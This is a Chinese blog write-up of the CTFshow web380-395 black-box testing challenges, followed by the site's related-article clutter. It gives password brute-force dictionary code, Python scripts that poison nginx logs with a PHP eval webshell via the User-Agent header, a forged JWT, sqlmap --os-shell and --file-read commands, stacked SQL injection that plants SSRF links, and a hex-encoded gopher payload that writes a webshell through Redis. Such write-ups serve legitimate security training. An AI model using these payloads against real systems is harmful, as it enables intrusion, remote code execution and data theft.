CTFSHOW黑盒测试篇

最新推荐文章于 2024-05-13 23:24:20 发布
最新推荐文章于 2024-05-13 23:24:20 发布
阅读量1.8k 收藏 3
点赞数 4
分类专栏: CTFSHOW web入门系列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/112522873
版权

文章目录

web380

payload
后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。
page.php?id=flag

web381

payload
在这里插入图片描述
地址在源码里面
在这里插入图片描述

web382、383

还是上面的地址,万能密码登录得到flag
在这里插入图片描述

web384

字典生成

import string
s1=string.ascii_lowercase
s2=string.digits
f=open('dict.txt','w')
for i in s1:
	for j in s1:
		for k in s2:
			for l in s2:
				for m in s2:
					p=i+j+k+l+m
					f.write(p+"\n")
f.close()

登录的时候抓包爆破
在这里插入图片描述
在这里插入图片描述
几率是676000分之一。。。。。还是在用户名如果真的是admin的前提下
payload admin xy123

web385

扫描后台得到/install
在这里插入图片描述
按照他说的访问install/?install
然后再去登录,如果大家上面题目用sql注入注出用户名密码会发现是admin admin888
登录就能得到flag了

web386

通过扫描后台发现clear.php和install
访问install
在这里插入图片描述
访问clear.php直接显示清理完成
盲猜一波file参数,删个index.php试试

在这里插入图片描述
哎呦还真可以
在这里插入图片描述
那直接把lock.dat删了,lock.dat在linstall下
在这里插入图片描述
剩下的就是上一题的重复了。
访问install/?install初始化账号密码
然后admin admin888登录

web387

接着扫描后台发现/debug,访问提示file not exit,那我们给他一个参数
在这里插入图片描述
存在文件包含,尝试包含日志,发现可以成功file=/var/log/nginx/access.log
在这里插入图片描述
那直接在UA里面写一句话就可以了,然后再包含日志
在这里插入图片描述
发现没成功,但是在源码里面看到如下内容,也就是传的参数没有被结束
在这里插入图片描述
那我们直接利用php吧dat文件删除是不是就可以了。
写入如下内容

<?php unlink('/var/www/html/install/lock.dat')?>

然后再去访问install/?install,发现确实成功了。
在这里插入图片描述
剩下的就是登录拿flag了。。

388

非预期解,可以写日志但是做了一些限制,所以绕过就好了。
payload:

import requests
import base64
url="http://fb707431-ebb7-41c8-9ce7-57da16163fec.chall.ctf.show/"
url2="http://fb707431-ebb7-41c8-9ce7-57da16163fec.chall.ctf.show/debug/?file=/var/log/nginx/access.log"
cmd=b"<?php eval($_POST[1]);?>"
cmd=base64.b64encode(cmd).decode()
headers={
	'User-Agent':'''<?php system('echo {0}|base64 -d  > /var/www/html/b.php');?>'''.format(cmd)
}
print(headers)
requests.get(url=url,headers=headers)
requests.get(url2)
print(requests.post(url+'b.php',data={'1':'system("cat alsckdfy/check.php");'}).text)

预期解参考视频https://www.bilibili.com/video/BV16A411W7GP

web389

在上题的基础上整了个jwt伪造
类似于web377 https://blog.csdn.net/miuzzx/article/details/111936737
然后将得到的jwt串放到脚本中

import requests
import base64
url="http://bf2e6fca-c437-4f5b-90c3-75b4087cfdc5.chall.ctf.show/"
url2="http://bf2e6fca-c437-4f5b-90c3-75b4087cfdc5.chall.ctf.show/debug/?file=/var/log/nginx/access.log"
cmd=b"<?php eval($_POST[1]);?>"
cmd=base64.b64encode(cmd).decode()
headers={
	'User-Agent':'''<?php system('echo {0}|base64 -d  > /var/www/html/b.php');?>'''.format(cmd),
	'Cookie':'auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYxMDQ0MDA5MSwiZXhwIjoxNjEwNDQ3MjkxLCJuYmYiOjE2MTA0NDAwOTEsInN1YiI6ImFkbWluIiwianRpIjoiYzNlM2U5NjQ4OGI3NWY0MzY4YmE4Njg0ZTRjZWJlZTQifQ.hEV8CkkdvhKsNL_OrssrBzjzstVhq7_sQNefiuplSqU'
}
print(headers)
requests.get(url=url,headers=headers)
requests.get(url2,headers=headers)
print(requests.post(url+'b.php',data={'1':'system("cat alsckdfy/check.php");'},headers=headers).text)

web390

在page.php页面存在sql注入
sqlmap一句话搞定
python sqlmap.py -u http://fdbabc63-b2f3-4050-8b2e-9f5ee609119a.chall.ctf.show/page.php?id=2 --file-read /var/www/html/alsckdfy/check.php --batch
运行完会将文件保存在你的本地,直接访问就拿到flag
在这里插入图片描述

web391

注入点不在page.php了,在输入标题的地方(随便点个页面就能看到)
在这里插入图片描述
继续sqlmap
python sqlmap.py -u http://042a780b-dfd3-4bd9-861c-81661b2915e0.chall.ctf.show/search.php?title=1 --file-read /var/www/html/alsckdfy/check.php --batch

web392

flag在/flag
python sqlmap.py -u http://175efaca-626f-46a6-bddd-68246b90c5f5.chall.ctf.show/search.php?title=1 --os-shell
在这里插入图片描述
在这里插入图片描述

web393

还是先用原来的方法直接进到shell里面,发下不行,读文件也不行,然后试了下–sql-shell可以成功。
但是也是无法使用load_file 和outfile。那我们看下和上个题的界面有哪些不同。
在最后面发现有个搜索引擎
在这里插入图片描述
随便访问一个发现其实是读取的百度的前端代码。那么如果把地址改成file:///flag,或者自己再添加一个url是不是就可以了。
先利用sqlmap跑出来数据库的表名列名
在这里插入图片描述
在这里插入图片描述
payload:
search.php?title=1';insert into link values(10,'a','file:///flag');(在search.php页面存在堆叠注入)
然后访问link.php?id=10就能得到flag

web394、395

非预期解1

直接读flag,flag在alsckdfy/check.php中,在上题的基础上过滤了一些字符,但是可以用16进制绕过。

payload:
search.php?title=1';insert into link values(10,'a',0x66696c653a2f2f2f7661722f7777772f68746d6c2f616c73636b6466792f636865636b2e706870); 16进制为file:///var/www/html/alsckdfy/check.php
然后访问link.php?id=10

非预期解2

攻击redis服务,fastcig
就是把上面的16进制改成攻击redis或者fastcgi的payload
然后访问下就可以了
但是前面要做一些工作,题目中的url字段默认长度最长为255所以我们需要修改下,
payload:
search.php?title=1';alter table link modify column url text;
然后就可以打相应的服务了。具体可以参考ssrf篇的360。
发下我的payload吧
search.php?title=1';insert into link values(11,'a',0x676f706865723a2f2f3132372e302e302e313a363337392f5f2532413125304425304125323438253044253041666c757368616c6c2530442530412532413325304425304125323433253044253041736574253044253041253234312530442530413125304425304125323432382530442530412530412530412533432533467068702532306576616c2532382532345f504f5354253542312535442532392533422533462533452530412530412530442530412532413425304425304125323436253044253041636f6e666967253044253041253234332530442530417365742530442530412532343325304425304164697225304425304125323431332530442530412f7661722f7777772f68746d6c2530442530412532413425304425304125323436253044253041636f6e666967253044253041253234332530442530417365742530442530412532343130253044253041646266696c656e616d65253044253041253234372530442530416162632e706870253044253041253241312530442530412532343425304425304173617665253044253041253041);
然后访问link.php?id=11就会生成abc.php 密码是1

yu22x
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
黑盒测试v11
08-03
1、注册新用户 2、开发成绩管理系统中所时有一项功能是输入学生英语成绩,系统 3、最近抖音很火的幸运盒子,操作规则如下: 4、某厂对一部分职工重新分配工作,分配
软件测试黑盒测试 方法大全
最新发布
06-01
黑盒测试 黑盒测试的概念 黑盒测试的实施过程 黑盒测试的数学知识 测试用例设计技术 黑盒测试用于回答以下问题: 1)如何测试功能的有效性? 2)何种类型的输入会产生好的测试用例? 3)系统是否对特定的输入值尤其...
CTFshow刷题日记-WEB-黑盒测试web380-395)文件包含、日志包含getshell、SQL注入
Love&Share
10-07 3047
web380-扫目录文件包含 扫目录,存在page.php 访问发现报错,$id参数,可能存在文件包含 /page.php?id=flag web381-读源码找后台地址 page.php已经无法文件包含 看源码有一个可疑的路径 访问这个目录,最后注意一定要带上/ web382-383弱口令加万能密码 上题的/alsckdfy/目录访问之后是个登录界面 burp抓包爆破就行了,p字段,这些都可以拿到flag web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,
CTFshow 黑盒测试
Elite的博客
07-10 997
黑盒测试是一种软件测试方法,它主要关注于测试系统外部的功能和行为,而不考虑内部的实现细节。
最新CTFShow-WEB入门--信息搜集详细Wp_ctfshow web,2024年最新看这文章就行了
2401_84264244的博客
05-13 937
index.phps。
【CTFSHOW】web入门 黑盒测试
7ruth0hn的博客
09-29 1264
文章目录写在前面web380web381web382web383web384web385web386web387web388web389web390web391web392web393web394web395参考资料 写在前面 一直没搞过渗透,先学学黑盒测试web380 进入题目发现是一个关于灯泡的悲伤故事,点进去,看到跳转到page_1.php页面。 我们访问page.php试试: 发现报错:$id.php,可以猜想需要传名称为id的参数,来访问id.php。我们访问page.php?id=1试试
ctfshow黑盒测试
qq_61768489的博客
01-28 595
在search.php这里使用堆叠注入来实现向link表中添加url,我们已知三个字段,并且id控制选择页面。与上题一样,不一样的点在于这题将file字符ban了,可以利用16进制0x绕过。link表里的第三个字段是url,也就认为是搜索引擎那里跳转的url。这里可以利用ssrf可以添加跳转页面即url字段,比如添加。现在的目的应该是删除这个lock.dat然后重置密码。这里传入什么参数也是靠黑盒来猜了,用file参数。$id应该是传的参数,是php的文件名。search.php的注入点,跑不出。
渗透测试-ctfshow 爆破(web入门)
保持微笑的博客
12-29 4903
渗透测试-ctfshow 爆破(web入门)
黑盒测试实验报告word文件
06-18
软件质量保证与测试黑盒测试实验报告,仅个人作品,不保证完全正确。
黑盒测试1
08-03
黑盒测试】是一种软件测试方法,主要关注软件的功能表现,而非其内部结构或工作原理。测试人员在执行黑盒测试时,就像最终用户一样,只关心软件能否按需求规格说明书的规定正常工作,而不涉及程序代码的具体实现。...
5.4 黑盒测试1
08-03
【5.4 黑盒测试】是软件测试中的一种重要方法,它主要关注软件的外部行为,即功能表现,而不关心内部结构或实现细节。这种测试策略也被称为功能测试、数据驱动测试或基于规格说明书的测试。在黑盒测试中,测试人员...
黑盒测试的方法-PPT
09-26
**黑盒测试方法** 在软件测试领域,黑盒测试是一种重要的测试策略,它主要关注软件的功能,不涉及内部结构或实现细节。此方法基于软件的需求规格说明书,通过模拟用户与软件的交互,来验证系统是否能正确执行预期...
网络安全基础-黑盒测试
08-24
网络安全是信息技术领域中的核心议题,而黑盒测试作为软件测试的一种方法,对于确保网络系统的安全性至关重要。在本文中,我们将深入探讨黑盒测试的基本概念、重要性以及在网络安全中的应用。 黑盒测试,又称为功能...
黑盒测试与白盒测试
03-23
第一个是规格说明测试,这个技术也称为黑盒测试,行为测试,数据驱动测试,功能测试以及输入/输出驱动测试。在这个方法中  单元测试的测试数据可以用两个基本的方法系统地构建。第一个是规格说明测试,这个技术也...
黑盒测试 Predate
04-10
前一日函数 前一日函数 前一日函数 Pre Date 是 NextDateNextDateNextDate NextDate的逆函数,即给定一 个月份、日期年会返回前的逆函数,即给定一 个月份、日期年会返回前的逆函数,即给定一 个月份、日期年会返回...
软件测试中的手机黑盒测试介绍
03-23
黑盒测试(black—boxtesting)又称功能测试、数据驱动测试或基于规范的测试。用这种方法进行测试时,被测程序被当作看不见内部的黑盒。在完全不考虑程序内部结构和内部特性的情况下,测试者仅依据程序功能的需求规范...
CTFSHOW权限维持
羽的博客
06-29 1115
CTFSHOW 权限维持
CTFSHOW大赛原题(web711-web725)
羽的博客
02-27 4025
文章目录web711web712web713web782web785web786web787web788web789 web711 扫描目录发现存在robots.txt,提示static/secretkey.txt 访问得到一串字符串ctfshow_love_you 然后进入正常的页面,有个登录和注册,随便注册个用户并且登录后,发现存在文件上传点。 但是上传php后缀的文件不解析,应该不是php写的了。 看下session,应该是一个jwt加密的。那就好说了,伪造一个admin用户,而且加密的秘钥应该就是刚
ctf刷题 ctfshow【网鼎杯】
weixin_44807430的博客
01-07 2266
纯粹学安全
ctfshow黑盒测试
09-29
黑盒测试是一种测试方法,它是在没有访问内部代码和结构的情况下对系统进行测试。在黑盒测试中,测试者只关注系统的输入和输出,而不考虑内部实现细节。这种测试方法旨在检查系统是否按照规格说明和用户需求正确地运行。 在ctfshow黑盒测试中,引用的代码片段提供了一些关于渗透测试中可能出现的问题和解决方案的信息。根据引用中的代码,黑名单功能被用于检测用户输入中是否包含某些禁止的关键词。根据引用和引用中的描述,测试者试图通过访问不同的URL和使用不同的参数来绕过黑名单功能,并尝试执行命令、读取文件和写入Webshell。 根据引用的信息,我们可以得出结论:ctfshow黑盒测试是一种针对系统安全进行的渗透测试,测试者试图绕过黑名单功能并执行一系列攻击操作,以测试系统的安全性和鲁棒性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值